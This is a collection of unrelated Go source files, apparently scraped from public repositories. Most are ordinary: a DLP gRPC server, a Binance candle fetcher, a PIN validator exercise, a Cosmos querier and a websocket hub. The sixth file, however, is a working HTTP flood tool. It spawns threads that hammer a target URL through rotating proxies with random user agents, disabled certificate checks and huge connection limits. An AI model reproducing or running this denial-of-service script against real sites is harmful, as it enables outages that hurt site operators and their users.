p := &alphapb.DlpAlphaStoredInfoTypeRegex{}
p.SetPattern(dcl.ValueOrEmptyString(o.Pattern))
sGroupIndexes := make([]int64, len(o.GroupIndexes))
for i, r := range o.GroupIndexes {
sGroupIndexes[i] = r
}
p.SetGroupIndexes(sGroupIndexes)
return p
}
// StoredInfoTypeToProto converts a StoredInfoType resource to its proto representation.
func StoredInfoTypeToProto(resource *alpha.StoredInfoType) *alphapb.DlpAlphaStoredInfoType {
p := &alphapb.DlpAlphaStoredInfoType{}
p.SetName(dcl.ValueOrEmptyString(resource.Name))
p.SetDisplayName(dcl.ValueOrEmptyString(resource.DisplayName))
p.SetDescription(dcl.ValueOrEmptyString(resource.Description))
p.SetLargeCustomDictionary(DlpAlphaStoredInfoTypeLargeCustomDictionaryToProto(resource.LargeCustomDictionary))
p.SetDictionary(DlpAlphaStoredInfoTypeDictionaryToProto(resource.Dictionary))
p.SetRegex(DlpAlphaStoredInfoTypeRegexToProto(resource.Regex))
p.SetParent(dcl.ValueOrEmptyString(resource.Parent))
p.SetLocation(dcl.ValueOrEmptyString(resource.Location))
return p
}
// applyStoredInfoType handles the gRPC request by passing it to the underlying StoredInfoType Apply() method.
func (s *StoredInfoTypeServer) applyStoredInfoType(ctx context.Context, c *alpha.Client, request *alphapb.ApplyDlpAlphaStoredInfoTypeRequest) (*alphapb.DlpAlphaStoredInfoType, error) {
p := ProtoToStoredInfoType(request.GetResource())
res, err := c.ApplyStoredInfoType(ctx, p)
if err != nil {
return nil, err
}
r := StoredInfoTypeToProto(res)
return r, nil
}
// applyDlpAlphaStoredInfoType handles the gRPC request by passing it to the underlying StoredInfoType Apply() method.
func (s *StoredInfoTypeServer) ApplyDlpAlphaStoredInfoType(ctx context.Context, request *alphapb.ApplyDlpAlphaStoredInfoTypeRequest) (*alphapb.DlpAlphaStoredInfoType, error) {
cl, err := createConfigStoredInfoType(ctx, request.GetServiceAccountFile())
if err != nil {
return nil, err
}
return s.applyStoredInfoType(ctx, cl, request)
}
// DeleteStoredInfoType handles the gRPC request by passing it to the underlying StoredInfoType Delete() method.
func (s *StoredInfoTypeServer) DeleteDlpAlphaStoredInfoType(ctx context.Context, request *alphapb.DeleteDlpAlphaStoredInfoTypeRequest) (*emptypb.Empty, error) {
cl, err := createConfigStoredInfoType(ctx, request.GetServiceAccountFile())
if err != nil {
return nil, err
}
return &emptypb.Empty{}, cl.DeleteStoredInfoType(ctx, ProtoToStoredInfoType(request.GetResource()))
}
// ListDlpAlphaStoredInfoType handles the gRPC request by passing it to the underlying StoredInfoTypeList() method.
func (s *StoredInfoTypeServer) ListDlpAlphaStoredInfoType(ctx context.Context, request *alphapb.ListDlpAlphaStoredInfoTypeRequest) (*alphapb.ListDlpAlphaStoredInfoTypeResponse, error) {
cl, err := createConfigStoredInfoType(ctx, request.GetServiceAccountFile())
if err != nil {
return nil, err
}
resources, err := cl.ListStoredInfoType(ctx, request.GetLocation(), request.GetParent())
if err != nil {
return nil, err
}
var protos []*alphapb.DlpAlphaStoredInfoType
for _, r := range resources.Items {
rp := StoredInfoTypeToProto(r)
protos = append(protos, rp)
}
p := &alphapb.ListDlpAlphaStoredInfoTypeResponse{}
p.SetItems(protos)
return p, nil
}
func createConfigStoredInfoType(ctx context.Context, service_account_file string) (*alpha.Client, error) {
conf := dcl.NewConfig(dcl.WithUserAgent("dcl-test"), dcl.WithCredentialsFile(service_account_file))
return alpha.NewClient(conf), nil
}
|
package repository
import "errors"
var (
// ErrDateBusy busy date
ErrDateBusy = errors.New("time is already taken by another event")
// ErrEventNotFound event not found
ErrEventNotFound = errors.New("event not found")
// ErrStorageUnavailable storage unavailable
ErrStorageUnavailable = errors.New("storage unavailable")
// ErrInvalidData invalid input data
ErrInvalidData = errors.New("invalid input data")
// ErrGetQueryResult no result from query
ErrGetQueryResult = errors.New("can not get result for query")
)
|
package main
import (
"github.com/WIZARDISHUNGRY/golinters/pkg/analyzer"
"golang.org/x/tools/go/analysis/singlechecker"
)
func main() {
singlechecker.Main(analyzer.InterfaceMustBePtr)
}
|
/*
Create a RegExp myRegExp to test if a string is a valid pin or not.
A valid pin has:
Exactly 4 or 6 characters.
Only numerical characters (0-9).
No whitespace.
Examples
myRegExp.test("1234") ➞ true
myRegExp.test("45135") ➞ false
myRegExp.test("89abc1") ➞ false
myRegExp.test("900876") ➞ true
myRegExp.test(" 4983") ➞ false
Notes
Empty strings should return false when tested.
If you need help, look in the Resources tab.
*/
package main
func main() {
assert(validate("1234") == true)
assert(validate("45135") == false)
assert(validate("89abc1") == false)
assert(validate("900876") == true)
assert(validate(" 4983") == false)
assert(validate("123456") == true)
assert(validate("4512a5") == false)
assert(validate("") == false)
assert(validate("21904") == false)
assert(validate("9451") == true)
assert(validate("213132") == true)
assert(validate(" 4520") == false)
assert(validate("15632") == false)
assert(validate("000000") == true)
}
func validate(s string) bool {
if len(s) != 4 && len(s) != 6 {
return false
}
for _, r := range s {
if !('0' <= r && r <= '9') {
return false
}
}
return true
}
func assert(x bool) {
if !x {
panic("assertion failed")
}
}
|
package main
import "fmt"
func main() {
name := "Ramesh"
convertedToSlice := []byte(name)
convertedSliceToString := string(convertedToSlice)
fmt.Println("Name --------> ", name) // --> string of a name
fmt.Println(name, "Byte array(Slice) ----> ", convertedToSlice)
fmt.Println(convertedToSlice, "convertedSliceToString--------->", convertedSliceToString)
}
|
package main
import (
"fmt"
"io/ioutil"
"strings"
"os"
"strconv"
"math/rand"
"net/http"
"net/url"
"log"
"time"
// "bytes"
"crypto/tls"
)
func main() {
rand.Seed(time.Now().UnixNano())
args := os.Args
var _URL, _PROXIES_FILE, _UAS_FILE, _METHOD, _POSTDATA, _COOKIE string
var _TIME, _RATE, _THREADS int
var _PROXIES, _USERAGENTS []string
_POSTDATA = ""
_COOKIE = ""
for k, v := range args {
if v == "-h" {
_URL = args[k+1]
}
if v == "-p" {
_PROXIES_FILE = args[k+1]
_PROXIES = loadProxysList(_PROXIES_FILE)
}
if v == "-pd" {
_POSTDATA = args[k+1]
}
if v == "-c" {
_COOKIE = args[k+1]
}
if v == "-u" {
_UAS_FILE = args[k+1]
_USERAGENTS = loadUserAgentsList(_UAS_FILE)
}
if v == "-m" {
_METHOD = args[k+1]
}
if v == "-t" {
time, err := strconv.Atoi(args[k+1])
if err == nil {
_TIME = time
} else {
fmt.Println("Time is number")
}
}
if v == "-r" {
rate, err := strconv.Atoi(args[k+1])
if err == nil {
_RATE = rate
} else {
fmt.Println("Rate is number")
}
}
if v == "-n" {
thread, err := strconv.Atoi(args[k+1])
if err == nil {
_THREADS = thread
} else {
fmt.Println("Threads is number")
}
}
}
//DEBUG
// fmt.Println(_URL)
// fmt.Println(_PROXIES_FILE)
// fmt.Println(_UAS_FILE)
// fmt.Println(_METHOD)
// fmt.Println(_TIME)
// fmt.Println(_RATE)
fmt.Println("Number of proxies :", len(_PROXIES))
fmt.Println("Number of useragents :", len(_USERAGENTS))
for count := 0; count < _THREADS; count++ {
go prepareRequest(_URL, _METHOD, _PROXIES, _USERAGENTS, _RATE, _TIME, _POSTDATA, _COOKIE)
}
time.Sleep(time.Duration(_TIME) * time.Second)
}
func loadProxysList(path string) ( []string ) {
data, err := ioutil.ReadFile(path)
if err != nil {
fmt.Println("File reading error", err)
}
list := string(data)
s := strings.Split(list, "\n")
return s
}
func loadUserAgentsList(path string) ( []string ) {
data, err := ioutil.ReadFile(path)
if err != nil {
fmt.Println("File reading error", err)
}
list := string(data)
s := strings.Split(list, "\n")
for k,v := range s {
s[k] = strings.ReplaceAll(v, "\r", "")
}
return s
}
func prepareRequest(_URL string, _METHOD string, _PROXIES []string, _USERAGENTS []string, _RATE int, _TIME int, _POSTDATA string, _COOKIE string) {
startTime := time.Now().Unix()
stopTime := startTime + (int64(_TIME))
for {
currentTime := time.Now().Unix()
if currentTime > stopTime {
return
}
proxy := _PROXIES[rand.Intn(len(_PROXIES) - 1) + 1]
useragent := _USERAGENTS[rand.Intn(len(_USERAGENTS) - 1) + 1]
makeRequest(_URL, _METHOD, proxy, useragent, _RATE, _POSTDATA, _COOKIE)
}
}
func makeRequest(host string, method string, proxy string, useragent string, _RATE int, _POSTDATA string, _COOKIE string) {
proxyURL, err := url.Parse("http://"+proxy)
if err != nil {
log.Println(err)
}
targetURL, err := url.Parse(host)
if err != nil {
log.Println(err)
}
if method == "GET" {
// data = nil
}
req, err := http.NewRequest(method, targetURL.String(), nil)
if err != nil {
// lastErr = err.Error()
}
if method == "POST" {
m, err := url.ParseQuery(_POSTDATA)
if err != nil {
// lastErr = err.Error()
}
data := url.Values{}
for k,v := range m {
data.Set(k, v[0])
}
req, err = http.NewRequest(method, targetURL.String(), strings.NewReader(data.Encode()))
}
// Set headers
req.Header.Set("Referer", targetURL.String())
req.Header.Set("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8")
req.Header.Set("Accept-encoding", "gzip, deflate, br")
req.Header.Set("Accept-language", "en-US,en;q=0.9,he-IL;q=0.8,he;q=0.7,tr;q=0.6")
req.Header.Set("Cache-Control", "no-cache")
req.Header.Set("Pragma", "no-cache")
req.Header.Set("Upgrade-Insecure-Requests", "1")
req.Header.Set("User-Agent", useragent)
if method == "POST" {
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
}
if _COOKIE != "" {
m, err := url.ParseQuery(_COOKIE)
if err != nil {
// lastErr = err.Error()
}
for k,v := range m {
cookie := http.Cookie{Name: k, Value: v[0]}
req.AddCookie(&cookie)
}
}
client := &http.Client{}
if targetURL.Scheme == "https" {
//Skip certificate verify for performance
secureTransport := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
Proxy: http.ProxyURL(proxyURL),
MaxIdleConns: 20000,
IdleConnTimeout: 60 * time.Second,
MaxConnsPerHost: 5000,
}
client = &http.Client{Timeout: time.Second * 10, Transport: secureTransport}
} else {
transport := &http.Transport{
Proxy: http.ProxyURL(proxyURL),
MaxIdleConns: 20000,
IdleConnTimeout: 60 * time.Second,
MaxConnsPerHost: 5000,
}
client = &http.Client{Timeout: time.Second * 10, Transport: transport}
}
for count := 0; count < _RATE; count++ {
resp, err := client.Do(req)
if err != nil {
return
}
defer resp.Body.Close()
}
}
|
package pdexv3
import (
"encoding/json"
"incognito-chain/common"
metadataCommon "incognito-chain/metadata/common"
"incognito-chain/privacy"
)
// AddOrderRequest
type AddOrderRequest struct {
TokenToSell common.Hash `json:"TokenToSell"`
PoolPairID string `json:"PoolPairID"`
SellAmount uint64 `json:"SellAmount"`
MinAcceptableAmount uint64 `json:"MinAcceptableAmount"`
Receiver map[common.Hash]privacy.OTAReceiver `json:"Receiver"`
RewardReceiver map[common.Hash]privacy.OTAReceiver `json:"RewardReceiver,omitempty"`
AccessOption
metadataCommon.MetadataBase
}
func (req AddOrderRequest) Hash() *common.Hash {
rawBytes, _ := json.Marshal(req)
hash := common.HashH([]byte(rawBytes))
return &hash
}
func (req *AddOrderRequest) UnmarshalJSON(raw []byte) error {
var temp struct {
TokenToSell common.Hash `json:"TokenToSell"`
PoolPairID string `json:"PoolPairID"`
SellAmount metadataCommon.Uint64Reader `json:"SellAmount"`
MinAcceptableAmount metadataCommon.Uint64Reader `json:"MinAcceptableAmount"`
Receiver map[common.Hash]privacy.OTAReceiver `json:"Receiver"`
RewardReceiver map[common.Hash]privacy.OTAReceiver `json:"RewardReceiver,omitempty"`
AccessOption
metadataCommon.MetadataBase
}
err := json.Unmarshal(raw, &temp)
*req = AddOrderRequest{
TokenToSell: temp.TokenToSell,
PoolPairID: temp.PoolPairID,
SellAmount: uint64(temp.SellAmount),
MinAcceptableAmount: uint64(temp.MinAcceptableAmount),
Receiver: temp.Receiver,
RewardReceiver: temp.RewardReceiver,
AccessOption: temp.AccessOption,
MetadataBase: temp.MetadataBase,
}
return err
}
|
package binance
import (
"context"
bin "github.com/adshao/go-binance"
"github.com/mhereman/cryptotrader/logger"
"github.com/mhereman/cryptotrader/types"
)
// GetSeries executes the get series request
func (b Binance) GetSeries(ctx context.Context, symbol types.Symbol, timeframe types.Timeframe) (series types.Series, err error) {
var ks *bin.KlinesService
var binanceSymbol, binanceInterval string
var response []*bin.Kline
var numKlines, index int
var kline *bin.Kline
var ohlc []types.OHLC
if binanceSymbol, err = b.symbolToBinance(symbol); err != nil {
logger.Errorf("Binance::GetSeries Error: %v\n", err)
return
}
if binanceInterval, err = b.timeframeToBinance(timeframe); err != nil {
logger.Errorf("Binance:GetSeries Error: %v\n", err)
return
}
ks = b.client.NewKlinesService()
ks.Symbol(binanceSymbol)
ks.Interval(binanceInterval)
if response, err = ks.Do(ctx); err != nil {
logger.Errorf("Binance::GetSeries Error: %v\n", err)
return
}
numKlines = len(response)
ohlc = make([]types.OHLC, numKlines, numKlines)
for index, kline = range response {
ohlc[index] = types.NewOHLC(
b.toFloat(kline.Open),
b.toFloat(kline.High),
b.toFloat(kline.Low),
b.toFloat(kline.Close),
b.toFloat(kline.Volume),
b.toTime(kline.OpenTime),
b.toTime(kline.CloseTime),
)
}
series = types.NewSeries(symbol, timeframe, ohlc)
return
}
|
package transformer
import (
"github.com/confluentinc/confluent-kafka-go/kafka"
)
// Transformer is an interface which is used by Kafka.Transformer
// in order to transform a kafka Message.
// If nil is returned the message will be ignored
type Transformer interface {
Transform(src *kafka.Message) []*kafka.Message
}
|
package graphkb
import "github.com/clems4ever/go-graphkb/internal/utils"
type RecurrentTask = utils.RecurrentTask
var NewRecurrentTask = utils.NewRecurrentTask
|
package serverconfigs
import "strings"
type ServerGroup struct {
fullAddr string
Servers []*ServerConfig
}
func NewServerGroup(fullAddr string) *ServerGroup {
return &ServerGroup{fullAddr: fullAddr}
}
// 添加服务
func (this *ServerGroup) Add(server *ServerConfig) {
this.Servers = append(this.Servers, server)
}
// 获取完整的地址
func (this *ServerGroup) FullAddr() string {
return this.fullAddr
}
// 获取当前分组的协议
func (this *ServerGroup) Protocol() Protocol {
for _, p := range AllProtocols() {
if strings.HasPrefix(this.fullAddr, p.String()+":") {
return p
}
}
return ProtocolHTTP
}
// 获取当前分组的地址
func (this *ServerGroup) Addr() string {
protocol := this.Protocol()
if protocol == ProtocolUnix {
return strings.TrimPrefix(this.fullAddr, protocol.String()+":")
}
return strings.TrimPrefix(this.fullAddr, protocol.String()+"://")
}
// 判断当前分组是否为HTTP
func (this *ServerGroup) IsHTTP() bool {
p := this.Protocol()
return p == ProtocolHTTP || p == ProtocolHTTP4 || p == ProtocolHTTP6
}
// 判断当前分组是否为HTTPS
func (this *ServerGroup) IsHTTPS() bool {
p := this.Protocol()
return p == ProtocolHTTPS || p == ProtocolHTTPS4 || p == ProtocolHTTPS6
}
// 判断当前分组是否为TCP
func (this *ServerGroup) IsTCP() bool {
p := this.Protocol()
return p == ProtocolTCP || p == ProtocolTCP4 || p == ProtocolTCP6
}
// 判断当前分组是否为TLS
func (this *ServerGroup) IsTLS() bool {
p := this.Protocol()
return p == ProtocolTLS || p == ProtocolTLS4 || p == ProtocolTLS6
}
// 判断当前分组是否为Unix
func (this *ServerGroup) IsUnix() bool {
p := this.Protocol()
return p == ProtocolUnix
}
// 判断当前分组是否为UDP
func (this *ServerGroup) IsUDP() bool {
p := this.Protocol()
return p == ProtocolUDP
}
// 获取第一个Server
func (this *ServerGroup) FirstServer() *ServerConfig {
if len(this.Servers) > 0 {
return this.Servers[0]
}
return nil
}
|
package keeper
import (
abci "github.com/tendermint/tendermint/abci/types"
"github.com/cosmos/cosmos-sdk/codec"
sdk "github.com/cosmos/cosmos-sdk/types"
sdkerrors "github.com/cosmos/cosmos-sdk/types/errors"
"github.com/irisnet/irismod/modules/coinswap/types"
)
// NewQuerier creates a querier for coinswap REST endpoints
func NewQuerier(k Keeper, legacyQuerierCdc *codec.LegacyAmino) sdk.Querier {
return func(ctx sdk.Context, path []string, req abci.RequestQuery) (res []byte, err error) {
switch path[0] {
case types.QueryLiquidity:
return queryLiquidity(ctx, req, k, legacyQuerierCdc)
default:
return nil, sdkerrors.Wrapf(sdkerrors.ErrUnknownRequest, "unknown query path: %s", path[0])
}
}
}
// queryLiquidity returns the total liquidity available for the provided denomination
// upon success or an error if the query fails.
func queryLiquidity(ctx sdk.Context, req abci.RequestQuery, k Keeper, legacyQuerierCdc *codec.LegacyAmino) ([]byte, error) {
var params types.QueryLiquidityParams
standardDenom := k.GetParams(ctx).StandardDenom
if err := legacyQuerierCdc.UnmarshalJSON(req.Data, ¶ms); err != nil {
return nil, sdkerrors.Wrap(sdkerrors.ErrJSONUnmarshal, err.Error())
}
if err := types.CheckUniDenom(params.ID); err != nil {
return nil, err
}
uniDenom := params.ID
tokenDenom, err := types.GetCoinDenomFromUniDenom(uniDenom)
if err != nil {
return nil, err
}
reservePool := k.GetReservePool(ctx, params.ID)
standard := sdk.NewCoin(standardDenom, reservePool.AmountOf(standardDenom))
token := sdk.NewCoin(tokenDenom, reservePool.AmountOf(tokenDenom))
liquidity := sdk.NewCoin(uniDenom, k.bk.GetSupply(ctx).GetTotal().AmountOf(uniDenom))
swapParams := k.GetParams(ctx)
fee := swapParams.Fee.String()
res := types.QueryLiquidityResponse{
Standard: standard,
Token: token,
Liquidity: liquidity,
Fee: fee,
}
bz, errRes := codec.MarshalJSONIndent(legacyQuerierCdc, res)
if errRes != nil {
return nil, sdkerrors.Wrap(sdkerrors.ErrJSONMarshal, err.Error())
}
return bz, nil
}
|
package security
import (
"html/template"
"net/http"
"strings"
"time"
)
// Serve a generic html page that does not need any variables inserted into it
func GenericPage(t *template.Template, name string, title string) func(w http.ResponseWriter, r *http.Request) {
return func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Cache-Control", "max-age=6,s-maxage=6,no-transform,public")
if strings.HasSuffix(name, "_xml") {
w.Header().Set("Content-type", "text/xml; charset=utf-8")
w.Write([]byte("<?xml version=\"1.0\"?>"))
}
year := time.Now().Year()
type Page struct {
Title []string
Slug string
Year int
}
headerTitle := []string{}
if len(title) > 0 {
headerTitle = []string{title}
}
Render(r, w, t, name, &Page{
headerTitle,
time.Now().Format("2006/01/02/"),
year})
}
}
|
package web
import (
"context"
"crypto/md5"
"fmt"
"github.com/gorilla/websocket"
"io"
"log"
"math/rand"
"net/http"
"strconv"
"sync"
"time"
)
var upgrader = websocket.Upgrader{}
func WsHandler(msgch *chan string, cm *Cmap) func(w http.ResponseWriter, r *http.Request) {
return func(w http.ResponseWriter, r *http.Request) {
id := createSessionId()
c, err := upgrader.Upgrade(w, r, http.Header{
"g_sessionid": []string{id},
})
cm.set(id, c)
if err != nil {
log.Print("upgrade:", err)
}
defer func() {
e := c.Close()
failOnError(e, "")
}()
c.SetCloseHandler(func(code int, text string) error {
delete(cm.M, id)
fmt.Println(code, text)
return nil
})
ctx, cancel := context.WithCancel(context.Background())
go func() {
for {
select {
case m := <-*msgch:
for _, v := range cm.M {
//fmt.Println("###" + k)
err = v.WriteMessage(websocket.TextMessage, []byte(m))
failOnError(err, "websocket failed")
}
case <-ctx.Done():
return
}
}
}()
for {
msgType, p, err := c.ReadMessage()
//fmt.Println("messageType: ", msgType)
if err != nil {
fmt.Println("read message from client -> ", err)
cancel()
return
} else {
if msgType == websocket.TextMessage {
*msgch <- string(p)
}
}
/*mt, message, err := c.ReadMessage()
if err != nil {
log.Println("read:", err)
break
}
log.Printf("recv: %s", message)
err = c.WriteMessage(mt, message)
if err != nil {
log.Println("write:", err)
break
}*/
}
}
}
func createSessionId() string {
nano := time.Now().UnixNano()
rand.Seed(nano)
return md5hash(md5hash(strconv.FormatInt(nano, 10)) + md5hash(strconv.FormatInt(rand.Int63(), 10)))
}
func md5hash(text string) string {
hashMd5 := md5.New()
_, err := io.WriteString(hashMd5, text)
failOnError(err, "")
return fmt.Sprintf("%x", hashMd5.Sum(nil))
}
type Cmap struct {
M map[string]*websocket.Conn
L sync.RWMutex
}
func (m *Cmap) set(key string, value *websocket.Conn) {
m.L.Lock()
defer m.L.Unlock()
m.M[key] = value
}
func (m *Cmap) get(key string) *websocket.Conn {
m.L.RLock()
defer m.L.RUnlock()
return m.M[key]
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.